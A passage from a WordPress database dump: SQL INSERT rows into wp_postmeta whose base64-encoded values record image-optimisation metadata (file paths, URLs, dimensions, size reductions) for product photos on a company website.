TI1MC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI1MC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTkzMywidGltZSI6MTQ4MzU2NTQyOCwiaWQiOjE3NDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTAtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTAtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNTAtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQwMSwidGltZSI6MTQ4MzU2NTQzMSwiaWQiOjE3NDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTAtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNTAtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjUzNywidGltZSI6MTQ4MzU2NTQzNCwiaWQiOjE3NDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTAtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNTAtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY0NywidGltZSI6MTQ4MzU2NTQzOCwiaWQiOjE3NDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTAtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTAtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNTAtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjk3MSwidGltZSI6MTQ4MzU2NTQ0MSwiaWQiOjE3NDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTAtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjUwLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNTAtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozOTAsInRpbWUiOjE0ODM1NjU0NDQsImlkIjoxNzQ1fV0='); 
INSERT INTO `wp_postmeta` VALUES (29266, 1744, 'wpfc_optimisation_reduction', '26313'); 
INSERT INTO `wp_postmeta` VALUES (29267, 1744, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtQVMuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NTQ0OSwiaWQiOiIxNzQ0In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNDJMLUFTLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI0MkwtQVMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjkxNiwidGltZSI6MTQ4MzU2NTQ1MiwiaWQiOjE3NDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtQVMtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNDJMLUFTLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjozMDI5LCJ0aW1lIjoxNDgzNTY1NDU2LCJpZCI6MTc0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNDJMLUFTLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI0MkwtQVMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI3MjAsInRpbWUiOjE0ODM1NjU0NTksImlkIjoxNzQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtQVMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMzA2NywidGltZSI6MTQ4MzU2NTQ2MywiaWQiOjE3NDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtQVMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNDJMLUFTLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NzgsInRpbWUiOjE0ODM1NjU0NjcsImlkIjoxNzQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtQVMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNDJMLUFTLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTEyLCJ0aW1lIjoxNDgzNTY1NDcwLCJpZCI6MTc0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNDJMLUFTLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI0MkwtQVMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU5NCwidGltZSI6MTQ4MzU2NTQ3MywiaWQiOjE3NDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtQVMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNDJMLUFTLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxODI2LCJ0aW1lIjoxNDgzNTY1NDc3LCJpZCI6MTc0NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtQVMtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNDJMLUFTLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDI3LCJ0aW1lIjoxNDgzNTY1NDgwLCJpZCI6MTc0NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtQVMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNDJMLUFTLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NjAzLCJ0aW1lIjoxNDgzNTY1NDgzLCJpZCI6MTc0NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtQVMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNDJMLUFTLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6Njg0LCJ0aW1lIjoxNDgzNTY1NDg3LCJpZCI6MTc0NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtQVMtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNDJMLUFTLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTY4LCJ0aW1lIjoxNDgzNTY1NDkxLCJpZCI6MTc0NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtQVMtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjQyTC1BUy05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM4OSwidGltZSI6MTQ4MzU2NTQ5NCwiaWQiOjE3NDR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29268, 1743, 'wpfc_optimisation_reduction', '25762'); 
INSERT INTO `wp_postmeta` VALUES (29269, 1743, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NTQ5OSwiaWQiOiIxNzQzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNDJMLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI0MkwtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjg4MywidGltZSI6MTQ4MzU2NTUwMiwiaWQiOjE3NDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNDJMLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyOTQ1LCJ0aW1lIjoxNDgzNTY1NTA1LCJpZCI6MTc0M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNDJMLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI0MkwtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI1ODcsInRpbWUiOjE0ODM1NjU1MDksImlkIjoxNzQzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjQyTC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMjg1OCwidGltZSI6MTQ4MzU2NTUxMywiaWQiOjE3NDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNDJMLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MDIsInRpbWUiOjE0ODM1NjU1MTYsImlkIjoxNzQzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNDJMLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjQyTC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTA4LCJ0aW1lIjoxNDgzNTY1NTE5LCJpZCI6MTc0M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNDJMLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI0MkwtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU3OCwidGltZSI6MTQ4MzU2NTUyMiwiaWQiOjE3NDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjQyTC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNDJMLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxODI4LCJ0aW1lIjoxNDgzNTY1NTI2LCJpZCI6MTc0M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI0MkwtMTYweDE2M